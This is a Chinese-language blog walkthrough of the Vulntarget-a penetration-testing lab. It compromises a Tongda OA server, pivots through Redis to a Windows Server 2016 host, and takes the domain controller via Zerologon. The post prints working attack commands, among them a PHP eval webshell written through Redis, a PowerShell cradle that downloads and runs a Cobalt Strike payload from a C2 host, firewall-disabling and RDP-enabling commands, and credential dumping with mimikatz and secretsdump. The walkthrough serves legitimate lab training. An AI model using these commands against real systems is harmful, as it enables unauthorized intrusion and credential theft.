Loading [MathJax]/jax/output/CommonHTML/config.js
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >Vulntarget-a靶场

Vulntarget-a靶场

作者头像
鸿鹄实验室
发布于 2022-11-02 08:56:53
发布于 2022-11-02 08:56:53
1.1K00
代码可运行
举报
文章被收录于专栏:鸿鹄实验室鸿鹄实验室
运行总次数:0
代码可运行

靶场地址:https://github.com/shengshengli/vulntarget

靶场拓展

kali攻击机IP:192.168.31.111 win7入口:192.168.31.6


首先进行端口扫描

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
PORT      STATE SERVICE      VERSION
80/tcp    open  http         nginx
|_http-title: \xCD\xA8\xB4\xEFOA\xCD\xF8\xC2\xE7\xD6\xC7\xC4\xDC\xB0\xEC\xB9\xAB\xCF\xB5\xCD\xB3
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-robots.txt: 1 disallowed entry 
|_/
110/tcp   open  pop3
| fingerprint-strings: 
|   GenericLines, HTTPOptions: 
|     +OK TDpop3Server 1.0 POP3 Server ready.
|     -ERR An error occured
|   NULL: 
|_    +OK TDpop3Server 1.0 POP3 Server ready.
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  tcpwrapped
|_ssl-date: 2022-06-29T08:51:28+00:00; -1m21s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: WIN7-PC
|   NetBIOS_Domain_Name: WIN7-PC
|   NetBIOS_Computer_Name: WIN7-PC
|   DNS_Domain_Name: win7-PC
|   DNS_Computer_Name: win7-PC
|   Product_Version: 6.1.7601
|_  System_Time: 2022-06-29T08:51:14+00:00
| ssl-cert: Subject: commonName=win7-PC
| Not valid before: 2022-06-27T13:42:35
|_Not valid after:  2022-12-27T13:42:35
5357/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port110-TCP:V=7.92%I=7%D=6/29%Time=62BC129D%P=x86_64-pc-linux-gnu%r(NUL
SF:L,29,"\+OK\x20TDpop3Server\x201\.0\x20POP3\x20Server\x20ready\.\r\n")%r
SF:(GenericLines,40,"\+OK\x20TDpop3Server\x201\.0\x20POP3\x20Server\x20rea
SF:dy\.\r\n-ERR\x20An\x20error\x20occured\r\n")%r(HTTPOptions,40,"\+OK\x20
SF:TDpop3Server\x201\.0\x20POP3\x20Server\x20ready\.\r\n-ERR\x20An\x20erro
SF:r\x20occured\r\n");
MAC Address: 4C:D5:77:CB:F4:99 (Chongqing Fugui Electronics)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: win7-PC
|   NetBIOS computer name: WIN7-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-06-29T16:51:13+08:00
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: WIN7-PC, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:5f:e9:81 (VMware)
|_clock-skew: mean: -1h37m21s, deviation: 3h34m39s, median: -1m21s
| smb2-time: 
|   date: 2022-06-29T08:51:13
|_  start_date: 2022-06-29T08:50:03

此机器存在ms17010漏洞,可以通过msf来拿到system权限,这里不做演示


访问80端口,是一个通达OA

访问/inc/expired.php,可得到通达OA的版本:11.3

访问/resque/worker.php,可以得到主机名:win7-PC

可以通过默认的用户名密码登录到后台 admin:空

在后台可以通过上传一个马,来getshell 在菜单-->系统设置-->系统参数设置-->OA服务设置处发现Web目录为:C:\MYOA\webroot\

设置附件上传的目录 菜单-->系统设置-->附件管理-->存储目录管理-->添加存储目录,将目录设置为C:\MYOA\webroot\

添加成功

现在开始上传文件,组织-->系统管理员

使用burp进行抓包上传,上传后的文件名是通过返回包中的id字段后半段文件名组成,例如:289128391.test.txt 上传的路径是get请求中module的值和返回包中id字段@后面的四位数,例如:/xx/1234 先随便上传一个txt文件,成功上传,并且返回包中有id值

得到文件路径为:/im/2206/1312269580.test.txt,访问发现上传成功

上传一个php文件,返回一串unicode编码

进行unicode解码发现不允许上传php文件

利用windows的特,在保存文件的时候会自动去除文件名后面的.,如果上传的文件名是test.php.这样就可以绕过,windows在保存文件的时候会保存成test.php 上传一个php冰蝎马,在文件后缀后面加一个.

上传成功,冰蝎连接http://192.168.31.6/im/2206/1459520029.shell.php

查看一下权限,发现是system权限

systeminfo查看一下主机的信息(win7专业版,64位,双网卡)

生成cs木马,通过冰蝎上传木马并运行,上线cs

使用mimikatz抓取明文密码logonpasswords,得到win7用户的密码是admin

查看防火墙状态,发现是开启的,然后关闭防火墙

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
 netsh advfirewall show allprofile state  查看防火墙的当前状态
 netsh advfirewall set  allprofile state off  关闭防火墙
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制

使用注册表开启3389

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

远程桌面连接即可

上传fscan来扫描第二张网卡C段的主机和可利用的漏洞(server2016是开了防火墙的,禁ping了,fscan需要加一个-np参数)

有一个10.0.20.99的主机,并且开放了80,135,445,6379端口 搭建隧道(frp+proxifier),访问10.0.20.99的80端口,只有一个hello world

进行目录扫描,发现有l.php和phpinfo.php

l.php是php探针,可以发现它的路径在C:/phpStudy/PHPTutorial/WWW/

获得路径可以直接通过redis未授权来写shell

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
config set dir C:/phpStudy/PHPTutorial/WWW/
config set dbfilename ccc1.php
set 1 "<?php eval($_REQUEST[1]);?>"
save

蚁剑连接,执行whoami,也是system权限,成功拿下server2016

使用蚁剑连接写入的木马

通过蚁剑上传冰蝎马,然后使用冰蝎连接

拿到第二台的shell,现在需要上线一下cs,在拿下的第一台win7机器中使用natbypass来进行端口流量的转发

将9500端口的流量转发到cs服务器

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
nb -listen 9500 9090
nb -slave 127.0.0.1:9090 cs_server:8181
代码语言:javascript
代码运行次数:0
运行
复制

首先拿第一台主机做一个监听器

使用钓鱼攻击,attacks-->web drive-by-->scripted web delivery,类型选用powershell

会得到powershell命令

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://cs_server:8181/a'))"
代码语言:javascript
代码运行次数:0
运行
复制

将里面的ip和端口换成win7的9500端口

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.0.20.98:9500/a'))"
代码语言:javascript
代码运行次数:0
运行
复制

将powershell命令,使用redis写入到windows启动项中

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
C:/Users/win2016/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/

shutdown -r -t 0将靶机重启,server2016成功上线cs

上线的2016权限是win2016,是一个低权限,准备生成一个exe木马丢到web目录下并执行

成功上线2016并且权限是system

用mimikatz抓明文密码没有抓到,获得hash并解码得到administrator的密码是Admin@123

查看网络信息,2016也是双网卡,还有一个10.0.10.111,并且2016是在域环境中

域控ip为:10.0.10.110 查看域内用户组列表net group /domain

查看域内的机器net group "domain computers" /domain,只有一个win2016的机器

查看域控机器net group "domain controllers" /domain,发现域控的主机名是win2019

得到域控的主机名和ip检测一下是否存在zerologon(CVE-2020-1472)漏洞

检测发现存在漏洞,使用exp将密码置空

使用impacket的secretsdump.py脚本将域控的hash值dump下来

得到域控administrator的hash

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15

使用psexec.py登录,获得域控2019的system权限

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-06-30,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 鸿鹄实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
vulntarget-e
这里外网win2016靶机有开防火墙,所以需要加个-d参数绕过防火墙进行端口扫描,但是这里扫的时候出了点问题,不过多试几次也能扫出来开放了5985端口(WinRM服务)和49773端口
MssnHarvey
2022/12/13
8660
vulntarget-e
【永久开源】vulntarget-a 打靶记录
乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
乌鸦安全
2022/03/11
4.1K0
【永久开源】vulntarget-a 打靶记录
pwnhub 深入敌后
从第一天晚上开始零零散散到17号晚,差不多做了几十个小时…由于实在没日过windows服务器,整个过程遇到各种没玩过的东西…稍微整理下writeup
LoRexxar
2023/02/21
2910
pwnhub 深入敌后
Vulntarget-b靶场
靶场地址:https://github.com/shengshengli/vulntarget
鸿鹄实验室
2022/11/02
1.1K0
Vulntarget-b靶场
​某内网域渗透靶场的writeup
本靶场是由"渗透攻击红队"所制作的一个靶场,看了看感觉效果十分不错,比较综合且有一定的思路扩展性.这里我们将会从别的一些角度来玩玩这个靶场,具体往下看。
Gcow安全团队
2021/11/19
3.2K0
除夕 | ATT&CK红队评估实战靶场vulnstack
开源靶场VulnStack是由国内红日安全团队打造一个靶场知识平台。靶场设计思路来源ATT&CK红队评估模式,从漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场。目前已有4个靶场环境,都可以通过百度云盘下载。 本次实战靶场地址:
tinyfisher
2020/02/14
2.8K0
除夕 | ATT&CK红队评估实战靶场vulnstack
★Kali信息收集★8.Nmap :端口扫描
突然发现,微信一次最多推送8篇 参数:(Zenmap是Nmap图形化工具,不想打指令的可以直接使用) 详细:https://nmap.org/man/zh/index.html 篇幅太长,微信文章最
逸鹏
2018/04/09
2.4K0
★Kali信息收集★8.Nmap :端口扫描
从外网到内网干翻服务器- web渗透实战,靶场环境搭建安装包-请君自取
链接:https://pan.baidu.com/s/1V_2GU52OP7gAbHVgJD8gGA
Khan安全团队
2021/12/09
1.1K0
从外网到内网干翻服务器- web渗透实战,靶场环境搭建安装包-请君自取
内网域渗透靶场学习二(未完结)
ATT&CK红队评估实战靶场二:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/
yulate
2023/05/02
6660
内网域渗透靶场学习二(未完结)
内网靶场实战——ATT&CK实战系列(四)
环境 环境地址如下: http://39.98.79.56/vuln/detail/6/ 接下来下载好后在VmWare中进行ovf导入即可,共计三个文件 接下来配置网络环境,在虚拟网络编辑器中添加两个网段 1、192.168.1.0 NAT模式 用于外网 2、192.168.183.0 仅主机模式 用于内网 接下来给三个虚拟机以及攻击机(kali)进行分配 DC: VMet8(192.168.183.130) Web(Ubuntu): VMet4、VMet8(192.168.1.130、192.16
用户9691112
2023/05/18
8750
内网靶场实战——ATT&CK实战系列(四)
【永久开源】vulntarget-c 打靶记录
乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
乌鸦安全
2022/03/11
1.5K0
【永久开源】vulntarget-c 打靶记录
红日靶场(一)vulnstack1 渗透分析
访问80端口是一个phpStudy 探针,结合phpinfo.php和探针知晓主目录在C:/phpStudy/WWW
用户10714950
2023/08/21
9460
红日靶场(一)vulnstack1 渗透分析
Hack the box靶机实战:Bastion
总的来说,Bastion 其实并不是一个特别简单的机器。如果使用 windows 可以更方便地解决这台靶机。Command VM 对于这台靶机其实挺不错的,不过我们也可以使用 kali 来完成这个靶机。
FB客服
2019/10/10
1.1K0
Hack the box靶机实战:Bastion
bWAPP练习
虚拟机下载地址: https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/
全栈程序员站长
2022/11/09
1.2K0
bWAPP练习
针对校园某服务器的一次渗透测试
由于是对内网直接进行大扫描,所以直接判断这不仅是一个 Web 服务器(多个),同时还运行着 FTP、数据库。
HACK学习
2019/08/30
5.6K1
针对校园某服务器的一次渗透测试
vulntarget-d
扫描一下存活主机与端口,发现开放了80、81、888、3306、8888端口,有宝塔的服务
MssnHarvey
2022/12/07
4490
vulntarget-d
ATT&CK红队评估实战靶场二
为了和靶机IP对应,我们先配置一下虚拟机的网卡IP,修改子网IP,NAT设置和DHCP设置
MssnHarvey
2022/12/05
1.3K0
ATT&CK红队评估实战靶场二
Hack The Box-Bastard
nmap还扫描出了36个目录其中CHANGELOG.txt存在drupal的版本信息,版本为7.54
鸿鹄实验室
2022/11/02
4740
Hack The Box-Bastard
内网靶场初探
内容写的很乱,因为第一次搞,有点不太熟练,所以各位师傅简单看看就好,写的比较好的文章,可以参考这两个 https://xz.aliyun.com/t/11588#toc-0 https://mp.weixin.qq.com
用户9691112
2023/05/18
7440
内网靶场初探
攻防|记一次平平无奇有手就行的幸运域控
最近在学习内网渗透,很想找个机会练练手。正好团队接到红队评估的项目,于是便有了此文,没什么技术含量,师傅们轻点喷。
亿人安全
2023/02/28
2K0
攻防|记一次平平无奇有手就行的幸运域控
相关推荐
vulntarget-e
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验